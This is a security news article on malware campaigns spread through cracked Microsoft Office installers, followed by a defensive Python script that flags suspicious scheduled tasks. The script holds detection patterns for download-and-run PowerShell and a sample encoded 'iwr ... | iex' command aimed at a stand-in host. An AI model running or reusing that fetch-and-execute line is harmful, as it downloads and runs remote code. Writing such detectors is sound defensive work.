Cracked MS Office launches malware strains on systems

June 6, 2024

Cybercriminals are distributing a mix of malware through cracked copies of MS Office that they advertise on torrent websites.

The malware delivered to people who take the bait includes remote access trojans (RATs), cryptocurrency miners, malware downloaders, proxy tools, and anti-AV tools. These attacks prompted researchers to document the ongoing campaign and to warn users about the dangers of installing unauthorised software.

Other researchers report that the attackers use a variety of lures, including Microsoft Office, Windows, and the Hangul Word Processor, which is popular in Korea.

These campaigns have been effective because the threat actors have built convincing cracked MS Office installers.

The installer has a polished UI that lets the user choose the Office version to install, the language, and whether to install the 32- or 64-bit build.

Behind that front end, however, the installer launches obfuscated .NET malware that contacts a Telegram or Mastodon channel to retrieve a currently valid download URL, then quietly fetches the remaining components in the background. The URL points to Google Drive or GitHub, both widely trusted services whose traffic is unlikely to trigger AV alerts.

The base64-encoded payloads hosted on those platforms contain PowerShell commands that deploy the various malware strains onto the system. The components are unpacked with 7-Zip, and a module named ‘Updater’ registers tasks in the Windows Task Scheduler so that the infection persists across reboots.

According to the researchers, the payloads installed on compromised systems include Orcus RAT, the XMRig cryptominer, 3Proxy, PureCrypter, and an anti-AV component (AntiAV). Even if the user finds and removes one of these, the ‘Updater’ module, which runs at system startup, reinstalls it.
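The persistence mechanism described above (an ‘Updater’ scheduled task that runs at startup and re-drops components) is something an incident responder can hunt for. The script below is an added example, not code from the article or from the researchers it cites: it parses Task Scheduler XML definitions and flags tasks whose executable lives in a user-writable directory, whose PowerShell arguments use hiding or encoded-command switches, or whose decoded command contains a download-and-run stage, and it notes when such a task also has a boot or logon trigger. The task definitions, the task names, and the URL inside the encoded command are all constructed samples for illustration; real exports are produced by `schtasks /query /XML` and carry a UTF-16 declaration, so read those from disk as bytes before parsing.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML (what `schtasks /query /XML` exports).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a dropped "Updater" typically lives in; legitimate services rarely do.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")

# PowerShell switches that hide the window or bypass policy, plus encoded-command forms.
SUSPICIOUS_ARGS = re.compile(
    r"-(?:e|ec|enc|encodedcommand|nop|noprofile|w\s+hidden|windowstyle\s+hidden|"
    r"ep\s+bypass|executionpolicy\s+bypass)\b", re.I)

# Strings inside a decoded command that indicate a download-and-run stage.
PAYLOAD_MARKERS = ("invoke-webrequest", "iwr ", "iex", "invoke-expression",
                   "downloadstring", "downloadfile", "7z", "drive.google.com", "github")


def decode_encoded_command(args):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or ''."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", args, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def assess_task(xml_text):
    """Parse one task definition and return (task name, list of reasons it looks suspicious)."""
    root = ET.fromstring(xml_text)
    name = root.findtext("t:RegistrationInfo/t:URI", default="?", namespaces=NS)
    reasons = []
    for exec_node in root.findall(".//t:Actions/t:Exec", NS):
        cmd = exec_node.findtext("t:Command", default="", namespaces=NS)
        args = exec_node.findtext("t:Arguments", default="", namespaces=NS)
        if any(p in cmd.lower() for p in USER_WRITABLE):
            reasons.append("executable in user-writable path: " + cmd)
        if SUSPICIOUS_ARGS.search(args):
            reasons.append("evasive PowerShell switches: " + args[:40])
        hits = [m for m in PAYLOAD_MARKERS if m in decode_encoded_command(args).lower()]
        if hits:
            reasons.append("encoded command fetches/executes payload: " + ", ".join(hits))
    # Boot/logon triggers are what let the "Updater" survive reboots and re-drop payloads.
    persistent = any(root.find(".//t:Triggers/" + t, NS) is not None
                     for t in ("t:BootTrigger", "t:LogonTrigger"))
    if persistent and reasons:
        reasons.append("runs at boot/logon, so removed components get reinstalled")
    return name, reasons


def scan_tasks(xml_docs):
    """Return only the tasks that produced at least one reason."""
    return [(name, reasons) for name, reasons in map(assess_task, xml_docs) if reasons]


def _task_xml(uri, trigger, command, arguments=""):
    """Build a minimal Task Scheduler XML document (constructed sample, not a real export)."""
    return f"""<Task version="1.2" xmlns="{NS['t']}">
  <RegistrationInfo><URI>{uri}</URI></RegistrationInfo>
  <Triggers>{trigger}</Triggers>
  <Actions Context="Author"><Exec>
    <Command>{command}</Command>
    <Arguments>{arguments}</Arguments>
  </Exec></Actions>
</Task>"""


# Hypothetical download-and-run stage of the kind the base64 payloads carry; the URL is invented.
_STAGE = "iwr https://github.invalid/example/p.txt -UseBasicParsing | iex"
_ENC = base64.b64encode(_STAGE.encode("utf-16-le")).decode()

# Constructed samples: a dropped updater, a hidden encoded PowerShell stage, and a benign vendor task.
SAMPLE_TASKS = [
    _task_xml(r"\Updater", "<LogonTrigger><Enabled>true</Enabled></LogonTrigger>",
              r"C:\Users\victim\AppData\Roaming\Updater\Updater.exe"),
    _task_xml(r"\Microsoft\Windows\Maintenance\Stage",
              "<BootTrigger><Enabled>true</Enabled></BootTrigger>",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"-NoP -W Hidden -Ep Bypass -Enc {_ENC}"),
    _task_xml(r"\Vendor\Update",
              "<CalendarTrigger><StartBoundary>2024-06-06T09:00:00</StartBoundary></CalendarTrigger>",
              r"C:\Program Files\Vendor\update.exe", "/silent"),
]

if __name__ == "__main__":
    for name, reasons in scan_tasks(SAMPLE_TASKS):
        print(name)
        for r in reasons:
            print("  -", r)
```

The check on the executable path matters as much as the PowerShell heuristics: a re-infection module needs to run from somewhere the installer could write without elevation, and a scheduled task pointing into AppData or ProgramData with a logon or boot trigger is exactly the artefact to remove (task and binary together) before cleaning the payloads it drops.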

Users should therefore be cautious with files downloaded from unknown or unverified sources and avoid pirated or cracked software altogether, since much of it is bait created by threat actors. Similar lures have been used to push STOP ransomware, the most active ransomware operation targeting consumers.

Because these files are not digitally signed, and users are often willing to dismiss AV warnings in order to run them, they are a reliable way to get malware onto a system. The safest course is not to obtain them at all.
